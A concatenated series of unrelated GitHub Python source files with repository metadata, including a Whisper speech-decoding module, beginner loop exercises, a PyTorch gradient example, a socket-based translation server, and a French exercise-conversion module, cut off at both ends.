self.model.install_cache()\n if tokens.shape[-1] > self.initial_token_length: tokens = tokens[:, -1:]\n\n return self.model.decoder(\n tokens, \n audio_features, \n kv_cache=self.kv_cache, \n log_tensors=log_tensors\n )\n\n def cleanup_caching(self):\n for hook in self.hooks:\n hook.remove()\n\n self.kv_cache = {}\n self.hooks = []\n\n def rearrange_kv_cache(self, source_indices):\n for module, tensor in self.kv_cache.items():\n self.kv_cache[module] = tensor[source_indices].detach()\n\nclass LogitFilter:\n def apply(self, logits:Tensor, tokens:Tensor) -> None:\n raise NotImplementedError\n\nclass SuppressBlank(LogitFilter):\n def __init__(self, tokenizer:Tokenizer, sample_begin:int):\n self.tokenizer = tokenizer\n self.sample_begin = sample_begin\n\n def apply(self, logits:Tensor, tokens:Tensor):\n if tokens.shape[1] == self.sample_begin:\n logits[:, self.tokenizer.encode(\" \") + [self.tokenizer.eot]] = -np.inf\n\nclass SuppressTokens(LogitFilter):\n def __init__(self, suppress_tokens: Sequence[int]):\n self.suppress_tokens = list(suppress_tokens)\n\n def apply(self, logits:Tensor, tokens:Tensor):\n logits[:, self.suppress_tokens] = -np.inf\n\nclass ApplyTimestampRules(LogitFilter):\n def __init__(\n self, tokenizer:Tokenizer, sample_begin:int, max_initial_timestamp_index:Optional[int]\n ):\n self.tokenizer = tokenizer\n self.sample_begin = sample_begin\n self.max_initial_timestamp_index = max_initial_timestamp_index\n\n def apply(self, logits:Tensor, tokens:Tensor):\n if self.tokenizer.no_timestamps is not None:\n logits[:, self.tokenizer.no_timestamps] = -np.inf\n\n for k in range(tokens.shape[0]):\n seq = [t for t in tokens[k, self.sample_begin :].tolist()]\n last_was_timestamp = len(seq) >= 1 and seq[-1] >= self.tokenizer.timestamp_begin\n penultimate_was_timestamp = len(seq) < 2 or seq[-2] >= self.tokenizer.timestamp_begin\n\n if last_was_timestamp:\n if penultimate_was_timestamp: # has to be non-timestamp\n logits[k, self.tokenizer.timestamp_begin :] = -np.inf\n else: # cannot be normal text tokens\n logits[k, : self.tokenizer.eot] = -np.inf\n\n if tokens.shape[1] == self.sample_begin:\n logits[:, : self.tokenizer.timestamp_begin] = -np.inf\n\n if self.max_initial_timestamp_index is not None:\n last_allowed = self.tokenizer.timestamp_begin + self.max_initial_timestamp_index\n logits[:, last_allowed + 1 :] = -np.inf\n\n logprobs = F.log_softmax(logits.float(), dim=-1)\n for k in range(tokens.shape[0]):\n timestamp_logprob = logprobs[k, self.tokenizer.timestamp_begin :].logsumexp(dim=-1)\n max_text_token_logprob = logprobs[k, : self.tokenizer.timestamp_begin].max()\n if timestamp_logprob > max_text_token_logprob:\n logits[k, : self.tokenizer.timestamp_begin] = -np.inf\n\nclass TokenDecoder:\n def reset(self): return\n\n def update(self, tokens:Tensor, logits:Tensor, sum_logprobs:Tensor) -> Tuple[Tensor, bool]:\n raise NotImplementedError\n\n def finalize(self, tokens:Tensor, sum_logprobs:Tensor) -> Tuple[Sequence[Sequence[Tensor]], List[List[float]]]:\n raise NotImplementedError\n\nclass GreedyDecoder(TokenDecoder):\n def __init__(self, temperature, eot):\n self.temperature = temperature\n self.eot = eot\n\n def update(self, tokens:Tensor, logits:Tensor, sum_logprobs:Tensor):\n if self.temperature <= 0: next_tokens = logits.argmax(dim=-1)\n else: next_tokens = Categorical(logits/self.temperature).sample()\n\n logprobs = F.log_softmax(logits.float(), dim=-1)\n sum_logprobs += logprobs[torch.arange(logprobs.shape[0]), next_tokens] * (tokens[:, -1] != self.eot)\n next_tokens[tokens[:, -1] == self.eot] = self.eot\n return torch.cat([tokens, next_tokens[:, None]], dim=-1), (tokens[:, -1] == self.eot).all()\n\n def finalize(self, tokens:Tensor, sum_logprobs:Tensor):\n return F.pad(tokens, (0,1), value=self.eot), sum_logprobs.tolist()\n\n@torch.no_grad()\ndef detect_language(model:\"Whisper\", mel:Tensor, tokenizer:Tokenizer = None) -> Tuple[Tensor, List[dict]]:\n if tokenizer is None:\n tokenizer = get_tokenizer(model.is_multilingual)\n if tokenizer.language is None or tokenizer.language_token not in tokenizer.sot_sequence:\n raise ValueError(\"This model dosen't have language tokens\")\n\n single = mel.ndim == 2\n if single: mel = mel.unsqueeze(0)\n\n if mel.shape[-2:] != (model.dims.n_audio_ctx, model.dims.n_audio_state):\n mel = model.encoder(mel)\n\n n_audio = mel.shape[0]\n x = torch.tensor([[tokenizer.sot]] * n_audio).to(model.device)\n logits = model.logits(x, mel)[:, 0] ## grab the first from sequence\n\n mask = torch.ones(logits.shape[-1], dtype=torch.bool)\n mask[list(tokenizer.all_language_tokens)] = False\n logits[:, mask] = -np.inf\n language_tokens = logits.argmax(dim=-1)\n language_token_probs = logits.softmax(dim=-1).cpu()\n language_probs = [\n {\n c: language_token_probs[i, j].item()\n for j, c in zip(tokenizer.all_language_tokens, tokenizer.all_language_codes)\n }\n for i in range(n_audio)\n ]\n\n if single:\n language_tokens = language_tokens[0]\n language_probs = language_probs[0]\n\n return language_tokens, language_probs\n\ndef maximum_likelyhood_ranker(tokens:List[List[Tensor]], sum_logprobs:List[List[float]], length_penalty:Optional[float]):\n def scores(logprobs, lengths):\n result = []\n for logprob, length in zip(logprobs, lengths):\n if length_penalty is None: penalty = length\n else: penalty = ((5 + length) / 6) ** length_penalty\n result.append(logprob/penalty)\n return result\n\n lengths = [[len(t) for t in s] for s in tokens]\n return [np.argmax(scores(p,l)) for p, l in zip(sum_logprobs, lengths)]\n\n@dataclass\nclass DecodingOptions:\n task:str = \"transcribe\" # whether to perform X->X \"transcribe\" or X->English \"translate\"\n language:Optional[str] = None # language that the audio is in; uses detected language if None\n\n # sampling-related options\n temperature:float = 0.0\n sample_len:Optional[int] = None # maximum number of tokens to sample\n best_of:Optional[int] = None # number of independent samples to collect, when t > 0\n beam_size:Optional[int] = None # number of beams in beam search, when t == 0\n patience:Optional[float] = None # patience in beam search (https://arxiv.org/abs/2204.05424)\n\n # options for ranking generations (either beams or best-of-N samples)\n length_penalty:Optional[float] = None # \"alpha\" in Google NMT, None defaults to length norm\n sequence_ranker:Callable = maximum_likelyhood_ranker\n\n # prompt, prefix, and token suppression\n prompt:Optional[Union[str, List[int]]] = None \n prefix:Optional[Union[str, List[int]]] = None \n suppress_blank:bool = True \n suppress_tokens:Optional[Union[str, Iterable[int]]] = \"-1\"\n without_timestamps:bool = False\n max_initial_timestamp:Optional[float] = 1.0 \n fp16:bool = False\n log_tensors:bool = False\n enable_cache:bool = True\n\n@dataclass(frozen=True)\nclass DecodingResult:\n audio_features:Tensor\n language:str\n language_probs:Optional[Dict[str, float]] = None\n tokens:List[int] = field(default_factory=list)\n text:str = \"\"\n avg_logprob:float = np.nan\n no_speech_prob:float = np.nan\n temperature:float = np.nan\n compression_ratio:float = np.nan\n \n@torch.no_grad()\ndef decode(model:\"Whisper\", mel:Tensor, options:DecodingOptions = DecodingOptions()) -> Union[DecodingResult, List[DecodingResult]]:\n print(f\"decoding, task = {options.task}..\")\n\n def verify_options():\n if options.beam_size is not None and options.best_of is not None:\n raise ValueError(\"beam_size and best_of can't be given together\")\n if options.temperature == 0:\n if options.best_of is not None:\n raise ValueError(\"best_of with greedy sampling (T=0) is not compatible\")\n if options.patience is not None and options.beam_size is None:\n raise ValueError(\"patience requires beam_size to be given\")\n if options.length_penalty is not None and not (0 <= options.length_penalty <= 1):\n raise ValueError(\"length_penalty (alpha) should be a value between 0 and 1\")\n\n return True\n\n def get_audio_features(mel:Tensor) -> Tensor:\n if options.fp16: mel = mel.half()\n if mel.shape[-2:] != (model.dims.n_audio_ctx, model.dims.n_audio_state):\n audio_features = model.encoder(mel)\n\n if audio_features.dtype != (torch.float16 if options.fp16 else torch.float32):\n raise TypeError(f\"audio_features have incorrect dtype: {audio_features.dtype}\")\n return audio_features\n\n def get_initial_tokens() -> Tuple[int]:\n tokens = list(sot_sequence)\n prefix = options.prefix\n prompt = options.prompt\n\n if prefix: \n prefix_tokens = (\n tokenizer.encode(\" \" + prefix.strip()) if isinstance(prefix, str) else prefix\n )\n\n if sample_len is not None:\n prefix_tokens = prefix_tokens[-(n_ctx//2 - sample_len):]\n tokens = tokens + prefix_tokens\n\n if prompt: \n prompt_tokens = (\n tokenizer.encode(\" \" + prompt.strip()) if isinstance(prompt, str) else prompt \n )\n tokens = [tokenizer.sot_prev] + prompt_tokens[-(n_ctx//2 - 1):] + tokens\n\n return tuple(tokens)\n \n def get_suppress_tokens() -> Tuple[int]:\n suppress_tokens = options.suppress_tokens\n\n if isinstance(suppress_tokens, str):\n suppress_tokens = [int(t) for t in suppress_tokens.split(\",\")]\n\n if -1 in suppress_tokens:\n suppress_tokens = [t for t in suppress_tokens if t >= 0]\n suppress_tokens.extend(tokenizer.non_speech_tokens)\n elif suppress_tokens is None or len(suppress_tokens) == 0:\n suppress_tokens = [] # interpret empty string as an empty list\n else:\n assert isinstance(suppress_tokens, list), \"suppress_tokens must be a list\"\n\n suppress_tokens.extend(\n [tokenizer.sot, tokenizer.sot_prev, tokenizer.sot_lm]\n )\n if tokenizer.no_speech is not None: \n suppress_tokens.append(tokenizer.no_speech)\n\n return tuple(sorted(set(suppress_tokens)))\n\n def get_language(audio_features:Tensor, tokens:Tensor):\n languages = [options.language] * audio_features.shape[0]\n lang_probs = None\n\n if options.task == \"lang_id\" or options.language is None:\n lang_tokens, lang_probs = detect_language(model, audio_features, tokenizer)\n languages = [max(p, key=p.get) for p in lang_probs]\n if options.language is None:\n tokens[:, sot_index + 1] = lang_tokens\n\n return languages, lang_probs\n\n def main_loop(audio_features:Tensor, tokens:Tensor):\n assert audio_features.shape[0] == tokens.shape[0]\n n_batch = audio_features.shape[0]\n sum_logprobs = torch.zeros(n_batch, device=audio_features.device)\n no_speech_probs = [np.nan] * n_batch\n\n try:\n for i in range(sample_len):\n logits = inference.logits(tokens, audio_features, options.log_tensors)\n\n if i == 0 and tokenizer.no_speech is not None:\n probs_at_sot = logits[:, sot_index].float().softmax(dim=-1)\n no_speech_probs = probs_at_sot[:, tokenizer.no_speech].tolist()\n\n logits = logits[:, -1] ## consider the last token only\n\n for logit_filter in logit_filters:\n logit_filter.apply(logits, tokens)\n\n tokens, completed = decoder.update(tokens, logits, sum_logprobs)\n if tokens.shape[-1] > n_ctx or completed:\n break\n finally: \n inference.cleanup_caching()\n\n return tokens, sum_logprobs, no_speech_probs\n\n def run(mel:Tensor) -> List[DecodingResult]:\n decoder.reset()\n n_audio:int = mel.shape[0]\n audio_features:Tensor = get_audio_features(mel)\n tokens:Tensor = torch.tensor([initial_tokens]).repeat(n_audio, 1)\n\n languages, lang_probs = get_language(audio_features, tokens)\n if options.task == \"lang_id\":\n return [\n DecodingResult(\n audio_features=features, language=language, language_probs=probs\n ) for features, language, probs in zip(audio_features, languages, lang_probs)\n ]\n\n audio_features = audio_features.repeat_interleave(n_group, dim=0)\n tokens = tokens.repeat_interleave(n_group, dim=0)\n print([tokenizer.decode(t) for t in tokens])\n tokens, sum_logprobs, no_speech_probs = main_loop(audio_features, tokens)\n\n audio_features = audio_features[::n_group]\n no_speech_probs = no_speech_probs[::n_group]\n assert audio_features.shape[0] == len(no_speech_probs) == n_audio\n\n tokens = tokens.reshape(n_audio, n_group, -1)\n sum_logprobs = sum_logprobs.reshape(n_audio, n_group)\n tokens, sum_logprobs = decoder.finalize(tokens, sum_logprobs)\n\n tokens:List[List[Tensor]] = [\n [t[sample_begin:(t==tokenizer.eot).nonzero()[0,0]] for t in s] for s in tokens\n ]\n\n selected = sequence_ranker(tokens, sum_logprobs, options.length_penalty)\n tokens:List[List[int]] = [s[i].tolist() for i, s in zip(selected, tokens)] \n texts:List[str] = [tokenizer.decode(s).strip() for s in tokens]\n sum_logprobs:List[float] = [lp[i] for i, lp in zip(selected, sum_logprobs)]\n avg_logprobs:List[float] = [lp/(len(s)+1) for s, lp in zip(tokens, sum_logprobs)]\n\n fields = (texts, languages, tokens, audio_features, avg_logprobs, no_speech_probs)\n if len(set(map(len, fields))) != 1:\n raise RuntimeError(f\"inconsistent result lengths: {list(map(len, fields))}\")\n\n return [\n DecodingResult(\n audio_features=features,\n language=language,\n tokens=tokens,\n text=text,\n avg_logprob=avg_logprob,\n no_speech_prob=no_speech_prob,\n temperature=options.temperature,\n compression_ratio=compression_ratio(text)\n )\n for (text, language, tokens, features, avg_logprob, no_speech_prob) in zip(*fields)\n ]\n\n single = mel.ndim == 2\n if single: mel = mel.unsqueeze(0)\n\n assert verify_options()\n\n model = copy.deepcopy(model)\n\n language = options.language or \"en\"\n tokenizer:Tokenizer = get_tokenizer(model.is_multilingual, language=language, task=options.task)\n n_group:int = options.beam_size or options.best_of or 1\n n_ctx:int = model.dims.n_text_ctx\n sample_len:int = options.sample_len or model.dims.n_text_ctx // 2\n\n sot_sequence:Tuple[int] = tokenizer.sot_sequence\n if options.without_timestamps:\n sot_sequence = tokenizer.sot_sequence_including_notimestamps\n\n initial_tokens:Tuple[int] = get_initial_tokens()\n sample_begin:int = len(initial_tokens)\n sot_index:int = initial_tokens.index(tokenizer.sot)\n\n inference = Inference(model, len(initial_tokens), options.enable_cache)\n\n sequence_ranker = options.sequence_ranker\n\n '''if options.beam_size is not None:\n decoder = BeamSearchDecoder(options.beam_size, tokenizer.eot, inference, options.patience)\n else:''' \n \n decoder = GreedyDecoder(options.temperature, tokenizer.eot)\n\n logit_filters = []\n if options.suppress_blank:\n logit_filters.append(SuppressBlank(tokenizer, sample_begin))\n if options.suppress_tokens:\n logit_filters.append(SuppressTokens(get_suppress_tokens()))\n if not options.without_timestamps:\n precision = CHUNK_LENGTH / model.dims.n_audio_ctx # usually 0.02 seconds\n max_initial_timestamp_index = None\n if options.max_initial_timestamp:\n max_initial_timestamp_index = round(options.max_initial_timestamp / precision)\n logit_filters.append(\n ApplyTimestampRules(tokenizer, sample_begin, max_initial_timestamp_index)\n )\n\n result = run(mel)\n if single: result = result[0]\n\n del model\n return result \n\n\n\n\n\n","repo_name":"asceznyk/talk","sub_path":"talk/decoding.py","file_name":"decoding.py","file_ext":"py","file_size_in_byte":17624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3813398468","text":"\"\"\"\nBreak in Python Python break is generally used to terminate a loop. \nThis means whenever the interpreter encounters the break keyword, \nit simply exits out of the loop. Once it breaks out of the loop, \nthe control shifts to the immediate next statement.\n\"\"\"\n\n\n\"To Do: Predict, then Run, and then Investigate\"\n\n# Combining iteration and Selection\"\n\nnumList = [1, 3, 4, 6, 1, 3, 5, 7]\nfor number in numList:\n if (number == 30):\n print(\"found\", number)\n break\nelse:\n print(\"Number not found\")\n\n\n\"Modify/Make\"\n\"To Do: Task 1: You have been provided with a list of modules below, write a for loop similar to the one above to break out of the loop when 'Python' is found\"\n# Refer to the code above to gide you in completing this task\n\ncourse_list = ['html', 'css', 'sql', 'python', 'javascript']\n\nfor course in course_list:\n if course == 'python':\n print('Just found Python!')\n break\n else:\n print('Couldnt find it :(')\n","repo_name":"agundogdu99/JustIT-Bootcamp","sub_path":"Python/Part3_IterationStartingFiles/1_forLoops/3_forList3.py","file_name":"3_forList3.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10315946310","text":"# An example of higher-order gradients computation\n\nimport torch\nfrom torch.autograd import grad\n\ndef nth_derivative(f, wrt, n):\n\n for i in range(n):\n\n grads = grad(f, wrt, create_graph=True)[0]\n f = grads.sum()\n\n return grads\n\nx = torch.arange(4., requires_grad=True).reshape(2, 2)\nloss = (x ** 4).sum()\n\nprint(nth_derivative(f=loss, wrt=x, n=3))","repo_name":"DefIntpMan/ATEX","sub_path":"src/0_toy.py","file_name":"0_toy.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"71182641058","text":"# zadanie 1.1\n\nhello = \"Hello\"\nstudent = \"Ola\"\n\nprint(\"{}\".format(hello)+\" {}\".format(student))\n\n# zadanie 1.2\n\nstudent = input(\"Wpisz swoje imie \")\n\nprint(\"Hello \"+student)\n\n# zadanie 1.3\n\nstudenci = [\"Ania\", \"Kuba\", \"Piotr\", \"Jan\"]\n\nliczba_studentow = len(studenci)\nprint(\"Liczba studentow wynosi: \" + str(liczba_studentow))\n\n# zadanie 1.4\n\nstudenci = [\"Ania\", \"Kasia\", \"Piotr\", \"Tomek\"]\n\nfor i in range(len(studenci)):\n print(\"Hello \"+ studenci[i])\n\n# zadanie 1.5\n\nliczba = 3\npotega = 4\n\nwynik = liczba**potega\n\nprint(\"Wynik wynosi: \" +str(wynik))\n\n# zadanie 1.6\n\nciag_znakow = \"edbw(hdakqas(skqskahb))adwndwb(wgwidn()dsqwhjdw)\"\nnawias = \"(\"\nliczba_nawiasow_otwierajacych = ciag_znakow.count(nawias)\n\nprint(\"Liczba nawiasow otwierajacych wynosi: \" + str(liczba_nawiasow_otwierajacych))\n\n# zadanie 1.7\n\nstudenci = [\"Anna Szczesny\", \"Tomasz Nijaki\", \"Barbara Kowalska\", \"Jan Niezbedny\"]\nposortowaniStudenci = sorted(studenci)\nfor student in posortowaniStudenci:\n print(student)\n\n# zadanie 1.8\n\nstudenci2 = [\"Anna Szczesny\", \"Tomasz Nijaki\", \"Barbara Kowalska\", \"Jan Niezbedny\"]\nposortowaneNazwiska = sorted(studenci2, key=lambda x: x.split()[1])\nfor student in posortowaneNazwiska:\n print(student)\n\n# zadanie 1.9\n\nstudenci3 = [\"Anna Szczesny\", \"Tomasz Nijaki\", \"Barbara Kowalska\", \"Jan Niezbedny\"]\nliczba_n = 0\nfor i in studenci3:\n if i.split()[1].startswith(\"N\"):\n liczba_n+=1\nprint(\"Liczba studentow na N wynosi: \"+ str(liczba_n))\n\n# zadanie 1.10\n\nwykres_1 = [[2, 4], [4, 4], [6, 4]]\nwykres_2 = [[2, 3], [4, 4], [6, 5]]\nwykres_3 = [[2, 3], [4, 3], [5, 4]]\n\ndef czyLiniowa(wykres):\n a1 = (wykres[1][1]-wykres[0][1])/(wykres[1][0]-wykres[0][0])\n a2 = (wykres[2][1]-wykres[0][1])/(wykres[2][0]-wykres[0][0])\n if a1==a2:\n funkcja = True\n else:\n funkcja = False\n return funkcja\n\nwykres_1_funkcja_liniowa = czyLiniowa(wykres_1)\nwykres_2_funkcja_liniowa = czyLiniowa(wykres_2)\nwykres_3_funkcja_liniowa = czyLiniowa(wykres_3)\n\nif wykres_1_funkcja_liniowa:\n print(\"Dla punktow w wykres_1 mozna wyznaczyc funkcje liniowa.\")\nelse:\n print(\"Dla punktow w wykres_1 nie mozna wyznaczyc funkcji liniowej.\")\n\nif wykres_2_funkcja_liniowa:\n print(\"Dla punktow w wykres_2 mozna wyznaczyc funkcje liniowa.\")\nelse:\n print(\"Dla punktow w wykres_2 nie mozna wyznaczyc funkcji liniowej.\")\n\nif wykres_3_funkcja_liniowa:\n print(\"Dla punktow w wykres_3 mozna wyznaczyc funkcje liniowa.\")\nelse:\n print(\"Dla punktow w wykres_3 nie mozna wyznaczyc funkcji liniowej.\")\n","repo_name":"izkacz/example_project","sub_path":"solo-work/solo_1.py","file_name":"solo_1.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5317858972","text":"import core, communicator\r\nimport socket\r\nimport os\r\nimport nltk\r\n\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver.bind((core.SERVER_IP,core.PORT))\r\nserver.listen()\r\nprint(\"Server listening on \" + core.SERVER_IP)\r\n\r\ndef receiveMessage(conn, addr):\r\n\ttry:\r\n\t\theader_rcv = conn.recv(core.HEADER_BUFFER).decode(core.FORMAT)\r\n\t\tprint(\"Received header: \" + header_rcv)\r\n\t\t# Receive header information\r\n\t\tmsg_len = int(header_rcv[:core.LEN_PAD])\r\n\t\tsignal = int(header_rcv[core.LEN_PAD:core.HEADER_BUFFER])\r\n\t\t\t\r\n\t\t# Receive input string\r\n\t\tmsg = conn.recv(msg_len).decode(core.FORMAT)\r\n\t\tprint(\"Received msg: \" + msg)\r\n\t\t\t\r\n\t\t# Write sentences into input file \r\n\t\tfile = open(os.getcwd() + core.INPUT_PATH + str(addr),'a')\r\n\t\tfor x in nltk.tokenize.sent_tokenize(msg):\r\n\t\t\tfile.write(x)\r\n\t\t\tfile.write('\\n')\r\n\t\tfile.close()\r\n\t\tprint(\"Finished writing input.\")\r\n\t\treturn int(signal)\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\treturn \r\n\r\ndef sendMessage(conn, addr):\t\r\n\ttry:\r\n\t\t# Open output file for the client, read it, then close\r\n\t\tfile = open(os.getcwd() + core.INPUT_PATH + str(addr),'r')\r\n\t\tmsg = file.read().replace('\\n', ' ')\r\n\t\tfile.close()\r\n\r\n\t\t# Send reply to client\r\n\t\theader = f'{len(msg.encode(core.FORMAT)):<{core.LEN_PAD}}'\r\n\t\tconn.send(header.encode(core.FORMAT))\r\n\t\tconn.send(msg.encode(core.FORMAT))\r\n\t\tprint(\"Sent header: \" + header)\r\n\t\tprint(\"Sent message: \" + msg)\r\n\t\t\r\n\t\t# Delete the output file after done sending\r\n\t\tos.remove(os.getcwd() + core.INPUT_PATH + str(addr))\r\n\t\t#os.remove(os.getcwd() + core.OUTPUT_PATH + str(addr))\r\n\t\tprint(\"Finished removing input-output files.\")\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\treturn None\r\n\r\ndef handleClient():\r\n while True:\r\n client, addr = server.accept()\r\n print(f\"Connected with {str(addr)}.\")\r\n while True:\r\n try:\t\r\n signal = communicator.receiveMessage(client, addr[-1])\r\n if signal == core.Operation['MT']:\r\n continue\r\n # os.environ['MKL_THREADING_LAYER'] = 'GNU'\r\n # os.system(f\"onmt_translate -model {core.TRANSLATION_MODEL_PATH} -src {os.getcwd() + core.INPUT_PATH + str(addr[-1])} -output {os.getcwd() + core.OUTPUT_PATH + str(addr[-1])}\")\r\n elif signal == core.Operation['GEC']:\r\n # Call model GEC here \r\n continue \r\n else:\r\n print(f\"Error. Closing connection with {str(addr)}.\")\r\n client.close()\r\n break\r\n communicator.sendMessage(client, addr[-1])\r\n except:\r\n print(f\"Error. Closing connection with {str(addr)}.\")\r\n client.close()\r\n break\r\n\r\nhandleClient()","repo_name":"HeyLongHoang/languator","sub_path":"server/server_test.py","file_name":"server_test.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19351416902","text":"'''\nf = open(\"test.txt\",mode = 'r',encoding = 'utf-8')\nw write mode\nr read mode\na append mode\n\nw+ create file if it doesn't exist and open it in write mode\nr+ open an existing file in read+write mode\na+ create file if it doesn't exist and open it in append mode\n'''\n\ntry:\n f = open(\"test.txt\",'r',encoding = 'utf-8')\n f.read()\n f.tell() # get the current file position\n f.seek(0) # bring file cursor to initial position\n #for line in f:\n #\tprint(line, end = '')\n # perform file operations\nfinally:\n f.close()","repo_name":"bharathmuppa/Python-tutos","sub_path":"programs/file-operations/file-read.py","file_name":"file-read.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6012298703","text":"from django.urls import path\nfrom .views import CreateAccountView, AccountProfileView, EditAccountView\n\n\napp_name = 'users'\n\nurlpatterns = [\n path('create-account/', CreateAccountView.as_view(), name='createAccount'),\n path('', AccountProfileView.as_view(), name='AccountProfile'),\n path('/edit', EditAccountView.as_view(), name='EditProfile'),\n]\n\n# int pk references a uniqueue user ID\n","repo_name":"FallowBlade/she-codes-django-news-project-FallowBlade","sub_path":"she_codes_news/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"29486139854","text":"import pymongo\n\nhostIP = \"10.192.213.155\"\nport = 10000\n\nclient = pymongo.MongoClient(host = hostIP, port = port)\ndb = client['IR']\ncollection = db['data']\n\ntmpDic = {\n 'userID': '00048766',\n 'temp': 38\n}\n\nresult = collection.insert(tmpDic)\nprint(result)","repo_name":"alien18331/Sample_Code","sub_path":"Function/mangoDB/mangoDB.py","file_name":"mangoDB.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"182008757","text":"from configparser import ConfigParser\nimport os\nimport re\nfrom transformers.pipelines.token_classification import TokenClassificationPipeline\nfrom spacy.lang.fr import French\nimport fantastic.paths\n# Fill\nfrom fantastic.exercises.fill.edit_phrase import EditPhrase\nfrom fantastic.exercises.fill.expression_ecrite import ExpressionEcrite\nfrom fantastic.exercises.fill.transforme_mot import TransformeMot\nfrom fantastic.exercises.fill.rc_double import RemplirClavierDouble\nfrom fantastic.exercises.fill.remplir_clavier import RemplirClavier\nfrom fantastic.exercises.fill.transforme_phrase import TransformePhrase\nfrom fantastic.exercises.fill.rc_cadre import RemplirClavierCadre\n# Select\nfrom fantastic.exercises.select.classe import Classe\nfrom fantastic.exercises.select.cache_intrus import CacheIntrus\nfrom fantastic.exercises.select.coche_groupe_mots import CocheGroupeMots\nfrom fantastic.exercises.select.coche_intrus import CocheIntrus\nfrom fantastic.exercises.select.coche_phrases import CochePhrases\nfrom fantastic.exercises.select.coche_mots import CocheMots\n# Choose\nfrom fantastic.exercises.choose.choix_multiples import ChoixMultiples\nfrom fantastic.exercises.choose.classe_cm import ClasseCM\nfrom fantastic.exercises.choose.vrai_faux import VraiFaux\n# Swap\nfrom fantastic.exercises.swap.swap import Swap\n# Show\nfrom fantastic.exercises.show.texte import Texte\n\n\n\nCLASS_NAME_DICT = {\n # Fill\n \"ExpressionEcrite\": ExpressionEcrite,\n \"RemplirClavier\": RemplirClavier,\n \"RemplirClavierCadre\": RemplirClavierCadre,\n \"RemplirClavierDouble\": RemplirClavierDouble,\n \"EditPhrase\": EditPhrase,\n \"TransformePhrase\": TransformePhrase,\n \"TransformeMot\": TransformeMot,\n # Select\n \"Classe\": Classe,\n \"CacheIntrus\": CacheIntrus,\n \"CocheIntrus\": CocheIntrus,\n \"CocheMots\": CocheMots,\n \"CochePhrases\": CochePhrases,\n \"CocheGroupeMots\": CocheGroupeMots,\n # Choose\n \"ChoixMultiples\": ChoixMultiples,\n \"ClasseCM\": ClasseCM,\n \"VraiFaux\": VraiFaux,\n # Swap\n \"Swap\": Swap,\n # Show\n \"Texte\": Texte\n }\n\nEXERCISE_TYPE_DICT = {\n # Fill\n \"ExpressionEcrite\": \"expression_ecrite\",\n \"RemplirClavier\": \"remplir_clavier\",\n \"RemplirClavierCadre\": \"rc_cadre\",\n \"RemplirClavierDouble\": \"rc_double\",\n \"EditPhrase\": \"edit_phrase\",\n \"TransformePhrase\": \"transforme_phrase\",\n \"TransformeMot\": \"transforme_mot\",\n # Select\n \"Classe\": \"classe\",\n \"CacheIntrus\": \"cache_intrus\",\n \"CocheIntrus\": \"coche_intrus\",\n \"CocheMots\": \"coche_mots\",\n \"CochePhrases\": \"coche_phrases\",\n \"CocheGroupeMots\": \"coche_groupe_mots\",\n # Choose\n \"ChoixMultiples\": \"choix-multiples\",\n \"ClasseCM\": \"classe-cm\",\n \"VraiFaux\": \"vrai-faux\",\n # Swap\n \"Swap\": \"swap\",\n # Show\n \"Texte\": \"texte\"\n}\n\nselect_subclasses: list = [\"Classe\",\"CacheIntrus\", \"CocheIntrus\", \"CocheMots\", \"CochePhrases\", \"CocheGroupeMots\"]\n\ndef convert_type_to_class_name(exercise_type: str):\n \"\"\"Convert the output folder name assiociated to a class to its real name class\"\"\"\n elems = re.split(r\"[-_\\s]\",exercise_type)\n class_name = \"\"\n for elem in elems:\n if len(elem) <= 2:\n if elem.lower() == \"rc\":\n class_name += \"RemplirCadre\"\n else:\n class_name += elem.upper()\n else:\n class_name += elem.capitalize()\n return class_name\n\ndef convert_class_name_to_type(class_name: str):\n \"\"\"Convert the class name to the output folder name assiociated to the class\"\"\"\n return EXERCISE_TYPE_DICT[class_name]\n\ndef generate_conversion_from_tag(id_exercise: str, tag: str, nlp_token_class: French = None, nlp: TokenClassificationPipeline = None):\n \"\"\"Generates the conversion of an exercise in a certain type (tag)\"\"\"\n def init_exercise(id_exercise: str, tag: str):\n \"\"\" initializes a new instance of the exercise with the given type (tag)\"\"\"\n if not tag in CLASS_NAME_DICT:\n return None\n json_path = os.path.join(fantastic.paths.JSON_DIR, id_exercise + \".json\")\n config = ConfigParser()\n config.read(os.path.join(fantastic.paths.FANTASTIC_DIR, \"exercises\", \"data.cfg\"))\n return CLASS_NAME_DICT[tag](json_path, config)\n\n exercise = init_exercise(id_exercise, tag)\n if not exercise:\n return \"\"\n exercise.load_json()\n exercise.create_template()\n if tag in select_subclasses:\n exercise.adapt(nlp_token_class, nlp)\n else:\n exercise.adapt()\n return exercise.html_output\n","repo_name":"sassoncharlotte/cartable-fantastique","sub_path":"fantastic/correction/backend/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27969200345","text":"from random import random\nfrom openpyxl import load_workbook, Workbook\nimport argparse\n\nclass Bomb:\n \"\"\"Model describe bomb with minions stickers.\"\"\"\n\n def __init__(self, id, is_broken):\n self.id = id\n self.is_broken = is_broken\n self.minions_stickers = {}\n\n\nclass Conveyor:\n \"\"\"Conveyor get bombs and creates minions workflow on conveyors\"\"\"\n\n def __init__(self, number_minions, minions_qualific, inspect, filename,\n sheet):\n \"\"\"Initialize a 